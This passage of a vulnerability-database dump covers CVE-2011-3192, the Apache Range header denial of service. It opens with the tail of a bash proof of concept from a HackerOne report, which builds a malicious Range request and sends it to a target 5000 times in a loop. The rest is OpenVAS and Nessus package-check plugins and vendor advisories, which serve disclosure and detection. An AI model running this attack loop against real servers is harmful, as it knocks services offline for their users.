,5-624,5-625,5-626,5-627,5-628,5-629,5-630,5-631,5-632,5-633,5-634,5-635,5-636,5-637,5-638,5-639,5-640,5-641,5-642,5-643,5-644,5-645,5-646,5-647,5-648,5-649,5-650,5-651,5-652,5-653,5-654,5-655,5-656,5-657,5-658,5-659,5-660,5-661,5-662,5-663,5-664,5-665,5-666,5-667,5-668,5-669,5-670,5-671,5-672,5-673,5-674,5-675,5-676,5-677,5-678,5-679,5-680,5-681,5-682,5-683,5-684,5-685,5-686,5-687,5-688,5-689,5-690,5-691,5-692,5-693,5-694,5-695,5-696,5-697,5-698,5-699,5-700,5-701,5-702,5-703,5-704,5-705,5-706,5-707,5-708,5-709,5-710,5-711,5-712,5-713,5-714,5-715,5-716,5-717,5-718,5-719,5-720,5-721,5-722,5-723,5-724,5-725,5-726,5-727,5-728,5-729,5-730,5-731,5-732,5-733,5-734,5-735,5-736,5-737,5-738,5-739,5-740,5-741,5-742,5-743,5-744,5-745,5-746,5-747,5-748,5-749,5-750,5-751,5-752,5-753,5-754,5-755,5-756,5-757,5-758,5-759,5-760,5-761,5-762,5-763,5-764,5-765,5-766,5-767,5-768,5-769,5-770,5-771,5-772,5-773,5-774,5-775,5-776,5-777,5-778,5-779,5-780,5-781,5-782,5-783,5-784,5-785,5-786,5-787,5-788,5-789,5-790,5-791,5-792,5-793,5-794,5-795,5-796,5-797,5-798,5-799,5-800,5-801,5-802,5-803,5-804,5-805,5-806,5-807,5-808,5-809,5-810,5-811,5-812,5-813,5-814,5-815,5-816,5-817,5-818,5-819,5-820,5-821,5-822,5-823,5-824,5-825,5-826,5-827,5-828,5-829,5-830,5-831,5-832,5-833,5-834,5-835,5-836,5-837,5-838,5-839,5-840,5-841,5-842,5-843,5-844,5-845,5-846,5-847,5-848,5-849,5-850,5-851,5-852,5-853,5-854,5-855,5-856,5-857,5-858,5-859,5-860,5-861,5-862,5-863,5-864,5-865,5-866,5-867,5-868,5-869,5-870,5-871,5-872,5-873,5-874,5-875,5-876,5-877,5-878,5-879,5-880,5-881,5-882,5-883,5-884,5-885,5-886,5-887,5-888,5-889,5-890,5-891,5-892,5-893,5-894,5-895,5-896,5-897,5-898,5-899,5-900,5-901,5-902,5-903,5-904,5-905,5-906,5-907,5-908,5-909,5-910,5-911,5-912,5-913,5-914,5-915,5-916,5-917,5-918,5-919,5-920,5-921,5-922,5-923,5-924,5-925,5-926,5-927,5-928,5-929,5-930,5-931,5-932,5-933,5-934,5-935,5-936,5-937,5-938,5-939,5-940,5-941,5-942,5-943,5-944,5-945,5-946,5-947,5-948,5-949,5-950,5-951,5-952,5-953,5-954,5-955,5-956,5-957,5-958,5-959,5-960,5-961,5-962,5-963,5-964,5-965,5-966,5-967,5-968,5-969,5-970,5-971,5-972,5-973,5-974,5-975,5-976,5-977,5-978,5-979,5-980,5-981,5-982,5-983,5-984,5-985,5-986,5-987,5-988,5-989,5-990,5-991,5-992,5-993,5-994,5-995,5-996,5-997,5-998,5-999,5-1000,5-1001,5-1002,5-1003,5-1004,5-1005,5-1006,5-1007,5-1008,5-1009,5-1010,5-1011,5-1012,5-1013,5-1014,5-1015,5-1016,5-1017,5-1018,5-1019,5-1020,5-1021,5-1022,5-1023,5-1024,5-1025,5-1026,5-1027,5-1028,5-1029,5-1030,5-1031,5-1032,5-1033,5-1034,5-1035,5-1036,5-1037,5-1038,5-1039,5-1040,5-1041,5-1042,5-1043,5-1044,5-1045,5-1046,5-1047,5-1048,5-1049,5-1050,5-1051,5-1052,5-1053,5-1054,5-1055,5-1056,5-1057,5-1058,5-1059,5-1060,5-1061,5-1062,5-1063,5-1064,5-1065,5-1066,5-1067,5-1068,5-1069,5-1070,5-1071,5-1072,5-1073,5-1074,5-1075,5-1076,5-1077,5-1078,5-1079,5-1080,5-1081,5-1082,5-1083,5-1084,5-1085,5-1086,5-1087,5-1088,5-1089,5-1090,5-1091,5-1092,5-1093,5-1094,5-1095,5-1096,5-1097,5-1098,5-1099,5-1100,5-1101,5-1102,5-1103,5-1104,5-1105,5-1106,5-1107,5-1108,5-1109,5-1110,5-1111,5-1112,5-1113,5-1114,5-1115,5-1116,5-1117,5-1118,5-1119,5-1120,5-1121,5-1122,5-1123,5-1124,5-1125,5-1126,5-1127,5-1128,5-1129,5-1130,5-1131,5-1132,5-1133,5-1134,5-1135,5-1136,5-1137,5-1138,5-1139,5-1140,5-1141,5-1142,5-1143,5-1144,5-1145,5-1146,5-1147,5-1148,5-1149,5-1150,5-1151,5-1152,5-1153,5-1154,5-1155,5-1156,5-1157,5-1158,5-1159,5-1160,5-1161,5-1162,5-1163,5-1164,5-1165,5-1166,5-1167,5-1168,5-1169,5-1170,5-1171,5-1172,5-1173,5-1174,5-1175,5-1176,5-1177,5-1178,5-1179,5-1180,5-1181,5-1182,5-1183,5-1184,5-1185,5-1186,5-1187,5-1188,5-1189,5-1190,5-1191,5-1192,5-1193,5-1194,5-1195,5-1196,5-1197,5-1198,5-1199,5-1200,5-1201,5-1202,5-1203,5-1204,5-1205,5-1206,5-1207,5-1208,5-1209,5-1210,5-1211,5-1212,5-1213,5-1214,5-1215,5-1216,5-1217,5-1218,5-1219,5-1220,5-1221,5-1222,5-1223,5-1224,5-1225,5-1226,5-1227,5-1228,5-1229,5-1230,5-1231,5-1232,5-1233,5-1234,5-1235,5-1236,5-1237,5-1238,5-1239,5-1240,5-1241,5-1242,5-1243,5-1244,5-1245,5-1246,5-1247,5-1248,5-1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299'\r\n\r\necho \"+ -- --=[Constructing buffer...\"\r\necho \"GET / HTTP/1.1\" > /tmp/buf\r\necho \"Host: $TARGET\" >> /tmp/buf \r\necho $BUFFER >> /tmp/buf\r\necho 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0' >> /tmp/buf\r\necho 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' >> /tmp/buf\r\necho 'Accept-Language: en-US,en;q=0.5' >> /tmp/buf\r\necho 'Accept-Encoding: gzip, deflate' >> /tmp/buf\r\necho 'Connection: keep-alive' >> /tmp/buf\r\necho \"\" >> /tmp/buf \r\nsleep 1 \r\ncat /tmp/buf #DEBUG ONLY\r\nsleep 1\r\n\r\necho \"+ -- --=[Sending exploit...\"\r\necho \"\"\r\nsleep 3\r\n\r\nfor a in {1..5000}; \r\ndo \r\n\tcat /tmp/buf | $CMD $TARGET $PORT; \r\n\tcat /tmp/buf\r\n\techo \"Request: $a\"\r\ndone\r\n\r\nrm -f /tmp/buf\r\necho \"+ -- --=[Done!\"", "modified": "2016-01-01T21:56:22", "published": "2015-09-14T22:55:12", "id": "H1:88904", "href": "https://hackerone.com/reports/88904", "type": "hackerone", "title": "ownCloud: Apache Range Header Denial of Service Attack (Confirmed PoC)", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-09-28T18:24:30", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2011-1245", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310122095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122095", "title": "Oracle Linux Local Check: ELSA-2011-1245", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1245.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122095\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:12:59 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2011-1245\");\n script_tag(name:\"insight\", value:\"ELSA-2011-1245 - httpd security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2011-1245\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2011-1245.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.0.1.el5_7.1\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.0.1.el6_1.2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T14:35:57", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120518", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120518", "title": "Amazon Linux Local Check: ALAS-2011-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2011-1.nasl 11703 2018-10-01 08:05:31Z cfischer $\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120518\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:43 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2011-1\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. (CVE-2011-3192 )All httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.18.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:51", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-252-01.", "modified": "2017-07-06T00:00:00", "published": "2012-09-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=71958", "id": "OPENVAS:71958", "title": "Slackware Advisory SSA:2011-252-01 httpd ", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_252_01.nasl 6581 2017-07-06 13:58:51Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-252-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Not long ago, httpd package updates were issued to clamp down on a denial of\nservice bug that's seen some action in the wild. New packages are available\nfor Slackware 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2011-252-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-252-01\";\n \nif(description)\n{\n script_id(71958);\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 6581 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:58:51 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-252-01 httpd \");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.1\", rls:\"SLK13.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.37\", rls:\"SLK13.37\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-03-18T14:40:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2011-252-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-10T00:00:00", "id": "OPENVAS:136141256231071958", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071958", "title": "Slackware Advisory SSA:2011-252-01 httpd", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2011_252_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from advisory SSA:2011-252-01\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71958\");\n script_cve_id(\"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-10 07:16:17 -0400 (Mon, 10 Sep 2012)\");\n script_name(\"Slackware Advisory SSA:2011-252-01 httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(12\\.0|12\\.1|12\\.2|13\\.0|13\\.1|13\\.37)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2011-252-01\");\n\n script_tag(name:\"insight\", value:\"Not long ago, httpd package updates were issued to clamp down on a denial of\nservice bug that's seen some action in the wild. New packages are available\nfor Slackware 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2011-252-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.1\", rls:\"SLK13.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"httpd\", ver:\"2.2.20-i486-1_slack13.37\", rls:\"SLK13.37\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "jvn": [{"lastseen": "2018-08-31T00:36:17", "bulletinFamily": "info", "description": "\n ## Description\n\nGIGAPOD file servers (Appliance model and Software model) from TripodWorks CO.,LTD. provide two web interfaces. First, a user web interface via ports 80/443, and a second, an administrative web interface via port 8001. The administrative web interface uses a version of the Apache HTTP server which contains a flaw in handling HTTP requests ([CVE-2011-3192](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192>)). As a result, GIGAPOD contains a denial-of-service (DoS) vulnerability.\n\n ## Impact\n\nA remote attacker may be able to cause a denial-of-service (DoS).\n\n ## Solution\n\n**Update the software** \nApply the appropriate update according to the information provided by the developer. \n\n\n ## Products Affected\n\n * GIGAPOD OFFICEHARD Appliance model versions 3.04.03 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Appliance model versions 3.01.02 and earlier\n * GIGAPOD 2010 / GIGAPOD 3 Software model versions 3.01.02 and earlier\n", "modified": "2014-10-16T00:00:00", "published": "2014-10-16T00:00:00", "id": "JVN:23809730", "href": "http://jvn.jp/en/jp/JVN23809730/index.html", "title": "JVN#23809730: GIGAPOD vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:31", "bulletinFamily": "scanner", "description": "The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "modified": "2018-04-18T00:00:00", "id": "ALA_ALAS-2011-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=78262", "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-1.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78262);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-1\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP\nheaders. A remote attacker could use this flaw to cause httpd to use\nan excessive amount of memory and CPU time via HTTP requests with a\nspecially crafted Range header. (CVE-2011-3192)\n\nAll httpd users should upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update httpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n 